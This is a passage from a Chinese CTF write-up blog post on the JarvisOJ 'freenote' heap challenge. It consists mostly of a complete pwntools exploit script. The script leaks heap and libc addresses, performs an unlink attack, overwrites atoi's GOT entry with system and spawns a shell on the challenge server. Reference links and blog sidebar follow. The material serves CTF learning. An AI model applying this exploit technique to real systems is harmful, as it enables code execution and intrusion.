<li>要 edit 的 chunk 在索引表中要表示为已分配。</li>
</ul>
<p>不知道为什么这么写的也可以自行调试一下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line">local = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">"../../freenote_x64"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    libc = ELF(<span class="string">"/lib/x86_64-linux-gnu/libc-2.23.so"</span>)</span><br><span class="line">    target = process(<span class="string">"../../freenote_x64"</span>)</span><br><span class="line">    gdb.attach(proc.pidof(target)[<span class="number">0</span>]) </span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    libc = ELF(<span class="string">"../../libc-2.19.so"</span>)</span><br><span class="line">    target = remote(<span class="string">"pwn2.jarvisoj.com"</span>, <span class="number">9886</span>)</span><br><span class="line"></span><br><span class="line">malloc_hook_libc = libc.symbols[<span class="string">"__malloc_hook"</span>]</span><br><span class="line">system_libc = libc.symbols[<span class="string">"system"</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">list</span><span class="params">()</span>:</span></span><br><span class="line">    target.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new</span><span class="params">(payload)</span>:</span></span><br><span class="line">    target.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'2'</span>)</span><br><span class="line">    target.sendlineafter(<span class="string">'new note: '</span>,str(len(payload)))</span><br><span class="line">    target.sendafter(<span class="string">'note: '</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(num,payload)</span>:</span></span><br><span class="line">    target.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'3'</span>)</span><br><span class="line">    target.sendlineafter(<span class="string">'number: '</span>,str(num))</span><br><span class="line">    target.sendlineafter(<span class="string">'note: '</span>,str(len(payload)))</span><br><span class="line">    target.sendafter(<span class="string">'your note: '</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(num)</span>:</span></span><br><span class="line">    target.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'4'</span>)</span><br><span class="line">    target.sendlineafter(<span class="string">'number: '</span>,str(num))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">new(<span class="string">'a'</span> * <span class="number">0x80</span>)</span><br><span class="line">new(<span class="string">'b'</span> * <span class="number">0x80</span>)</span><br><span class="line">new(<span class="string">'c'</span> * <span class="number">0x80</span>)</span><br><span class="line">new(<span class="string">'d'</span> * <span class="number">0x80</span>)</span><br><span class="line">new(<span class="string">'e'</span> * <span class="number">0x80</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">log.progress(<span class="string">'leak heap address'</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">'a'</span> * <span class="number">0x80</span> + <span class="string">'e'</span> * <span class="number">0x10</span>)</span><br><span class="line">list()</span><br><span class="line">target.recvuntil(<span class="string">"e"</span> * <span class="number">0x10</span>)</span><br><span class="line">heap_base = u64(target.recvuntil(<span class="string">"\n"</span>, drop=<span class="keyword">True</span>).ljust(<span class="number">0x8</span>, <span class="string">'\x00'</span>)) - <span class="number">0x1810</span> - <span class="number">0x10</span> - <span class="number">0x90</span> * <span class="number">3</span></span><br><span class="line">success(<span class="string">"leak heap address OK"</span>)</span><br><span class="line"></span><br><span class="line">log.progress(<span class="string">'leak libc address'</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">'a'</span> * <span class="number">0x80</span> + <span class="string">'e'</span> * <span class="number">0x18</span>)</span><br><span class="line">list()</span><br><span class="line">target.recvuntil(<span class="string">"e"</span> * <span class="number">0x18</span>)</span><br><span class="line">libc_base = u64(target.recvuntil(<span class="string">"\n"</span>, drop=<span class="keyword">True</span>).ljust(<span class="number">0x8</span>, <span class="string">'\x00'</span>)) - malloc_hook_libc - <span class="number">0x20</span> - <span class="number">88</span></span><br><span class="line">success(<span class="string">"leak libc address OK"</span>)</span><br><span class="line"></span><br><span class="line">log.progress(<span class="string">'unlink'</span>)</span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x80</span>) + p64(heap_base + <span class="number">0x30</span> - <span class="number">0x18</span>) + p64(heap_base + <span class="number">0x30</span> - <span class="number">0x10</span>) + <span class="string">'a'</span> * (<span class="number">0x80</span> - <span class="number">4</span> * <span class="number">8</span>) + p64(<span class="number">0x80</span>) + p64(<span class="number">0x90</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>, <span class="string">'p'</span>)</span><br><span class="line">edit(<span class="number">0</span>, payload)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">success(<span class="string">"unlink OK"</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">2</span>) + p64(<span class="number">1</span>) + p64(<span class="number">0x80</span>) + p64(heap_base + <span class="number">0x30</span>) + p64(<span class="number">1</span>) + p64(<span class="number">8</span>) + p64(elf.got[<span class="string">"atoi"</span>])</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>, <span class="string">'p'</span>)</span><br><span class="line">edit(<span class="number">0</span>, payload)</span><br><span class="line"><span class="comment">#list()</span></span><br><span class="line"><span class="comment">#target.recvuntil('1. ')</span></span><br><span class="line"><span class="comment">#libc_base2 = u64(target.recvuntil("\n",drop=True).ljust(0x8,'\x00')) - libc.symbols['atoi']</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">1</span>, p64(libc_base + system_libc))</span><br><span class="line"></span><br><span class="line">success(<span class="string">'heapbase: '</span> + hex(heap_base))</span><br><span class="line">success(<span class="string">'libcbase: '</span> + hex(libc_base))</span><br><span class="line"><span class="comment">#success('libcbase2: ' + hex(libc_base2))</span></span><br><span class="line"></span><br><span class="line">target.sendlineafter(<span class="string">'choice: '</span>,<span class="string">'/bin/sh\x00'</span>)</span><br><span class="line"></span><br><span class="line">target.interactive()</span><br><span class="line">target.close()</span><br></pre></td></tr></table></figure>
<hr>
<p>参考文章：</p>
<p><a href="https://blog.csdn.net/qq_38204481/article/details/82808011" target="_blank" rel="noopener">https://blog.csdn.net/qq_38204481/article/details/82808011</a></p>
<p><a href="https://www.cnblogs.com/0xJDchen/p/6195919.html" target="_blank" rel="noopener">https://www.cnblogs.com/0xJDchen/p/6195919.html</a></p>
<p><a href="https://www.360zhijia.com/anquan/427474.html" target="_blank" rel="noopener">https://www.360zhijia.com/anquan/427474.html</a></p>
<p><a href="https://www.cnblogs.com/alisecurity/p/5486458.html" target="_blank" rel="noopener">https://www.cnblogs.com/alisecurity/p/5486458.html</a></p>
<p><a href="https://www.cnblogs.com/alisecurity/p/5520847.html" target="_blank" rel="noopener">https://www.cnblogs.com/alisecurity/p/5520847.html</a></p>
<p><a href="http://www.cnblogs.com/snip3r/p/9962960.html" target="_blank" rel="noopener">http://www.cnblogs.com/snip3r/p/9962960.html</a></p>
<p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/heap_structure/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/heap_structure/</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/05/09/堆入门-JarvisOJ-Level6-x64/" data-id="cjvgph7su002bkov6r4sbmb1c" class="article-share-link">分享</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pwn/">Pwn</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/05/09/虚拟机环境搭建/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">虚拟机环境搭建</div>
    </a>
  
</nav>

  
</article>



</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Twings</h1>
    <h2 class="blog-subtitle"></h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://github.com/Aluvion/aluvion.github.io/blob/master/css/images/31733328.jfif?raw=true">
    <h2 class="author">Aluvion</h2>
    <h3 class="description">摸鱼</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>34</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>6</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="https://github.com/Aluvion" target="_blank" title="Github">
          Github
        </a>
      
        <a class="hvr-bounce-in" href="https://www.jianshu.com/u/4cdc8b6d5436" target="_blank" title="简书">
          简书
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="https://github.com/Pr0phet" target="_blank" title="pr0phet">
          pr0phet
        </a>
      
        <a class="hvr-bounce-in" href="https://coomrade.github.io" target="_blank" title="C0mRaDe">
          C0mRaDe
        </a>
      
        <a class="hvr-bounce-in" href="http://blog.y2pj.tw/wordpress/" target="_blank" title="y2pj">
          y2pj
        </a>
      
        <a class="hvr-bounce-in" href="https://zszcr.github.io/" target="_blank" title="zszcr">
          zszcr
        </a>
      
        <a class="hvr-bounce-in" href="https://23r3f.github.io/" target="_blank" title="23r3f">
          23r3f
        </a>
      
        <a class="hvr-bounce-in" href="https://xi4or0uji.github.io/" target="_blank" title="xi4or0uji">
          xi4or0uji
        </a>
      
        <a class="hvr-bounce-in" href="https://hack4.fun/" target="_blank" title="tokyocolq">
          tokyocolq
        </a>
      
        <a class="hvr-bounce-in" href="https://glarcy.github.io/" target="_blank" title="glarcy">
          glarcy
        </a>
      
        <a class="hvr-bounce-in" href="https://wulidecade.cn" target="_blank" title="小白">
          小白
        </a>
      
        <a class="hvr-bounce-in" href="https://littleredlie.github.io/" target="_blank" title="LittleRed">
          LittleRed
        </a>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
    </div>
  </div>
</div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2018 - 2019 Aluvion<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
    </div>
    
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  <link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
  <script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>



  <link rel="stylesheet" href="/plugin/galmenu/GalMenu.css">
  <script src="/plugin/galmenu/GalMenu.js"></script>
  <div class="GalMenu GalDropDown">
      <div class="circle" id="gal">
        <div class="ring">
          
            <a href="/" title="" class="menuItem">首页</a>
          
            <a href="/tags" title="" class="menuItem">标签</a>
          
            <a href="/categories" title="" class="menuItem">分类</a>
          
            <a href="/archives" title="" class="menuItem">归档</a>
          
            <a href="/???" title="" class="menuItem">None</a>
          
            <a href="/???" title="" class="menuItem">None</a>
          
        </div>
        
          <audio id="audio" src="#"></audio>
        
      </div> 
</div>
<div id="overlay" style="opacity: 1; cursor: pointer;"></div>
  <script type="text/javascript">var items = document.querySelectorAll('.menuItem');
    for (var i = 0,
    l = items.length; i < l; i++) {
      items[i].style.left = (50 - 35 * Math.cos( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%";
      items[i].style.top = (50 + 35 * Math.sin( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%"
    }</script>
<script type="text/javascript">
  $(document).ready(function() {
    $('body').GalMenu({
      'menu': 'GalDropDown'
    })
  });
</script>

  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>
<script src="/js/script.js"></script>



  </div>
</body>
</html>